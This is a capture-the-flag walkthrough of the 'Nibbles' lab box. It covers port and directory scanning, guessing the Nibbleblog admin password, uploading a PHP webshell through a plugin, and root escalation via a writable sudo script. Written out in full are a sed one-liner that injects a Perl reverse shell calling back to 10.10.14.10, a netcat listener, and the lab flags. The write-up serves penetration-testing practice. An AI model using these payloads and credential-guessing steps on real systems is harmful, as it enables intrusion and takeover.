This is an easy linux box
Tools used
- browser
- cat
- ffuf
- ls
- nc
- nmap
- searchsploit
- sed
- sudo
- unzip
Reconnaissance
Nmap
nmap -sC -sV -oA nibbles 10.10.10.75 -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Here’s what nmap teaches us :
- port 22 (SSH) - OpenSSH 7.2p2
- port 80 (HTTP) - Apache 2.4.18
Not a lot of open ports, let’s first go to the web port.
There’s not a lot of thing here, so I went up the source code and here’s what was in it :
<!-- /nibbleblog/ directory. Nothing interesting here! -->
Went on it :
So this is a blog and we can see at the bottom right that this is “Powered by Nibbleblog”. From here I used ffuf to do some files/directories brute force.
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.75/nibbleblog/FUZZ -e .php,.html,.txt -t 250
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0-git
________________________________________________
:: Method : GET
:: URL : http://10.10.10.75/nibbleblog/FUZZ
:: Wordlist : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 250
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
index.php [Status: 200, Size: 2985, Words: 116, Lines: 61]
themes [Status: 301, Size: 322, Words: 20, Lines: 10]
feed.php [Status: 200, Size: 302, Words: 8, Lines: 8]
admin [Status: 301, Size: 321, Words: 20, Lines: 10]
admin.php [Status: 200, Size: 1401, Words: 79, Lines: 27]
plugins [Status: 301, Size: 323, Words: 20, Lines: 10]
install.php [Status: 200, Size: 78, Words: 11, Lines: 1]
update.php [Status: 200, Size: 1621, Words: 103, Lines: 88]
languages [Status: 301, Size: 325, Words: 20, Lines: 10]
sitemap.php [Status: 200, Size: 401, Words: 33, Lines: 11]
content [Status: 301, Size: 323, Words: 20, Lines: 10]
Looking throught those files and directories, I was able to found the version of blog used, a login page and a user :
Knowing the version installed let’s see if there is known exploits :
Nice, there is one ! It’s a Metasploit module, let’s read the code and do it manually, first download the exploit :
searchsploit -m php/remote/38489.rb
Reading throught the code, I first need an account to exploit this flaw :
Nibbleblog contains a flaw that allows a authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.
Let’s go back to our login page, I know the username, just missing the password ! Let’s try default passwords :
- admin:admin - Not working
- admin:root - Not working
- admin:password - Not working
- admin:administrator - Not working
- admin:nibbles - Working
I now have the admin account ! I did not fully understand the metasploit module, so I search on Google how to exploit the Nibbleblog flaw and I found this wiki with a great explanation : https://wikihak.com/how-to-upload-a-shell-in-nibbleblog-4-0-3/.
Now let’s exploit !
Exploit
First go to :
http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
Then browse and upload a webshell or reverse shell. I used a webshell that I very like which is p0wny-shell (https://github.com/flozz/p0wny-shell). Ignore the warnings upon upload :
And now go to :
http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
I have a webshell as the user ! Now it’s time to root ! First things that I do, is to check if I can run commands as someone else :
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
I can run a bash script with root privileges ! So if I can modify monitor.sh it’s a win !
p0wny@shell:/home/nibbler# ls
personal.zip
user.txt
Unzip the zip file, like so :
p0wny@shell:/home/nibbler# unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
Now let’s see the rights of this file :
p0wny@shell:…/personal/stuff# ls -al
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
Nice I can modify it ! It’s a win, I just have to add a reverse shell in the file and launch it as root.
sed -i '1i perl -e '\''use Socket;$i="10.10.14.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'\''' monitor.sh
This is adding my perl reverse shell (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) at the begining of the file. Launch a nc listener :
nc -lvp 1234
And launch the script with root privileges :
sudo -u root /home/nibbler/personal/stuff/monitor.sh
Go check the nc listner :
nc -lvp 1234
listening on [any] 1234 ...
10.10.10.75: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.75] 52660
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
Voila ! I’m root, now go read the flags.
Flags
User.txt
cat user.txt
b02ff32bb332deba49eeaed21152c8d8
Root.txt
cat root.txt
b6d745c0dfb6457c55591efc898ef88c